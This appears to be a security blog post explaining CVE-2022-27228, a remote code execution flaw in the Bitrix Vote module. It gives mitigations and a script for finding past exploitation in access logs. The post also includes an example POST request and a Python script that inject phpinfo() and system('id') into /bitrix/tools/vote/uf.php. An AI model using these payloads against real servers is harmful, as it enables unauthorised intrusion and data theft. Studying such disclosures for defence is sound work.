Bitrix Site Manager is a popular content management system, widely used for websites and business portals. One of its many modules is "Vote" (also known as "Polls, Votes"), which lets users create and manage surveys and polls. Features bring attack surface, and in early 2022 a critical vulnerability was disclosed in exactly this module.
This post gives a simple, step-by-step breakdown of CVE-2022-27228. We'll look at what the bug is, how it can be abused, and walk through example code so you understand how a remote attacker could run their own code on a victim's web server.
Quick Summary
> In vulnerable versions of Bitrix Site Manager (Vote module before 21.0.100), an unauthenticated remote attacker can execute arbitrary code on the server through flaws in the "Polls, Votes" module, caused by improper sanitization of user input and insecure use of PHP functions.
How Does the Exploit Work?
The vulnerability lives in the way the Vote module processes certain user-supplied data. Because that data is not properly validated, an attacker can send a specially crafted HTTP request whose content ends up being interpreted as PHP and executed by the server, with the privileges of the web application.
1. Get a vulnerable Bitrix install (Vote module before 21.0.100).
2. Locate the Vote module's request handler. The module's code lives under /bitrix/modules/vote/; the script that accepts user input over HTTP is /bitrix/tools/vote/uf.php.
The Exploit (Example Code)
For this walkthrough, assume the vulnerable endpoint is /bitrix/tools/vote/uf.php and that the problem arises from the way the script processes parameters such as vote_id or USER_FIELD_ID. The request below is illustrative, not a copy of a real exploit.
A classic RCE payload might look like this:
POST /bitrix/tools/vote/uf.php HTTP/1.1
Host: target.site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

USER_FIELD_ID=1;phpinfo();//&arResult[FIELDS][]=test
The Content-Length counts the body exactly as shown (52 bytes); a real client would percent-encode the square brackets and adjust the length accordingly. The example tries to break out of the expected value and get phpinfo(); evaluated by the server. If exploitation succeeds, the response contains the PHP info page, proving that user-supplied code was executed.
Here's a basic Python snippet that automates the same request, this time running the id command instead of phpinfo():
import requests

# Illustrative endpoint and payload from the walkthrough above; adjust for the target.
url = "https://target.site.com/bitrix/tools/vote/uf.php"
payload = {
    "USER_FIELD_ID": "1;system('id');//",  # command that runs if the injection works
    "arResult[FIELDS][]": "test",
}

# Unauthenticated POST: no session cookie or login is required.
response = requests.post(url, data=payload, timeout=10)
print(response.status_code)
print(response.text)
References & Additional Links
- Original CVE Entry: CVE-2022-27228 on NVD
- Security Advisory: Bitrix Security Bulletin
- Exploit Listing: Exploit DB
Further Reading:
- Russian write-up with PoC
- GitHub Example
How to Protect Your Site
Update your Bitrix installation so the Vote module is at version 21.0.100 or later immediately.
If you can't upgrade, disable the "Vote" module and block access to /bitrix/tools/vote/uf.php at the web server. Disabling the module alone is not enough if the script stays reachable, so do both.
Example (Apache 2.4 .htaccess; the directory must allow AuthConfig overrides for Require to take effect):
<Files "uf.php">
Require all denied
</Files>
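The equivalent rule for nginx, as an added example that is not part of the original post. It assumes the Bitrix document root is served by the enclosing server block; the exact-match location takes precedence over the usual regex `.php` handler, so the script is refused before PHP ever sees the request.

```nginx
# Added example: block the Vote module's request handler at the web server.
# Exact-match (=) locations win over regex locations such as ~ \.php$,
# so this is evaluated before the PHP-FPM handler.
location = /bitrix/tools/vote/uf.php {
    deny all;      # every client gets 403, regardless of source address
}
```

Test the rule with a plain request after reloading nginx: `curl -i https://your.site/bitrix/tools/vote/uf.php` should return 403, while the rest of the site keeps working.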
Key Takeaways
- CVE-2022-27228 is a severe bug because it allows anyone (no login needed) to fully control servers running affected Bitrix versions.
- The bug can be triggered with a single web request and can be used to plant webshells, steal data, or pivot to further attacks.
- Patching is critical: old Bitrix installs are a magnet for attackers because of this RCE flaw.
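If you patched late, you also want to know whether anyone hit the endpoint before the fix. The following script, an added example that is not part of the original post, parses web server access logs in the common combined format and reports every request to /bitrix/tools/vote/uf.php, grouped by source address, together with whether the request was actually served (status below 400) or already refused by a block rule. The log lines are constructed for the example; point it at your real access.log to hunt.

```python
import re
import sys

# Apache/nginx combined log format (assumed; adjust the regex for custom formats).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)

# The Vote module handler discussed in the post.
TARGET_PATH = "/bitrix/tools/vote/uf.php"

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Mar/2022:18:20:01 +0000] "POST /bitrix/tools/vote/uf.php HTTP/1.1" 200 5120 "-" "python-requests/2.27.1"',
    '203.0.113.5 - - [22/Mar/2022:18:20:03 +0000] "POST /bitrix/tools/vote/uf.php HTTP/1.1" 200 312 "-" "python-requests/2.27.1"',
    '198.51.100.7 - - [22/Mar/2022:18:21:10 +0000] "GET /bitrix/tools/vote/uf.php?test=1 HTTP/1.1" 403 199 "-" "curl/7.81.0"',
    '192.0.2.9 - - [22/Mar/2022:18:22:00 +0000] "GET /index.php HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    'garbage line that is not in combined format',
]


def parse_line(line):
    """Return a dict for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop the query string so uf.php?anything still matches the target.
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec


def find_vote_endpoint_hits(lines):
    """All requests to the Vote handler; 'served' is True when the request was not refused."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        # Case-insensitive compare: cheap insurance against odd path casing in logs.
        if rec is None or rec["path"].lower() != TARGET_PATH:
            continue
        rec["served"] = rec["status"] < 400  # 403/404 means a block rule did its job
        hits.append(rec)
    return hits


def summarize(hits):
    """Per-source counts: total requests, requests served, POSTs (the exploit shape)."""
    by_ip = {}
    for h in hits:
        s = by_ip.setdefault(h["ip"], {"requests": 0, "served": 0, "post": 0})
        s["requests"] += 1
        s["served"] += int(h["served"])
        s["post"] += int(h["method"] == "POST")
    return by_ip


if __name__ == "__main__":
    # Usage: python hunt_uf.py [access.log]; without an argument the sample lines are scanned.
    lines = open(sys.argv[1], encoding="utf-8", errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    hits = find_vote_endpoint_hits(lines)
    for ip, s in sorted(summarize(hits).items(), key=lambda kv: -kv[1]["served"]):
        flag = "INVESTIGATE" if s["served"] else "blocked"
        print(f"{ip:16} requests={s['requests']} served={s['served']} post={s['post']}  {flag}")
```

Any source with served POSTs to the handler on a pre-21.0.100 install should be treated as a possible compromise: check the web root and upload directories for new PHP files around those timestamps rather than assuming the patch closed the door in time.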
Stay safe! Always keep your CMS and its modules up to date. Vulnerabilities like CVE-2022-27228 are exactly what mass scanners look for when picking their next victim.
*This post is written for educational purposes. Do not use these techniques on systems you do not own or have permission to test.*
Timeline
Published on: 03/22/2022 18:15:00 UTC
Last modified on: 03/28/2022 20:40:00 UTC